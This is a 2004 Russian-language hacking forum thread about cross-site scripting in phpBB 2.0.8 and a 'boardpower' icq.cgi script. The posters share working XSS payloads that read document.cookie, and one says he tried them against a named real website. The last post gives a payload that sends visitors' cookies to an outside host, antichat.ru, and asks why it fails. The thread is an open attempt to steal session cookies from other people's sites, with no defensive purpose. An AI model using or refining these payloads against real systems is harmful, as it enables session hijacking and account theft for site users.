Форумы Xss в phpBB 2.0.8

Discussion in 'Уязвимости CMS/форумов' started by Guest, 5 Aug 2004.

  1. Guest

    Guest Guest

    Reputations:
    0
    В phpBB 2.0.8 есть уязвимость в search.php и показан пример </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">http://www.example.com/phpBB2/search.php?search_author='<script&gt;alert(document.cookie)&lt;/script&gt;[/QUOTE]<span id='postcolor'>
    проверал на саитах но не на одново неработает, например:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">http://www.bpmdigitaldjgear.com/phpBB2/search.php?search_author='<script&gt;alert('kkl&#39[​IMG];&lt;/script&gt;[/QUOTE]<span id='postcolor'>

    помогите, что делаю нетак?
     
  2. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Закрыта там эта бага...
    Да все равно от нее толку - ноль
     
  3. DDF

    DDF New Member

    Joined:
    5 Aug 2004
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Вот нашел boardpower баг работаюший если так
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">boardpower/icq.cgi?action=<script&gt;javascript:alert(document.cookie);&lt;/script&gt;[/QUOTE]<span id='postcolor'>
    показивает как надо, но если так
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">boardpower/icq.cgi?action=%3Cscript%3Ewindow.location='http://antichat.ru/cgi-bin/s.jpg?Info='+document.cookie%3C/script%3E[/QUOTE]<span id='postcolor'>
    то неработает.
    почему &nbsp;window.location неработает?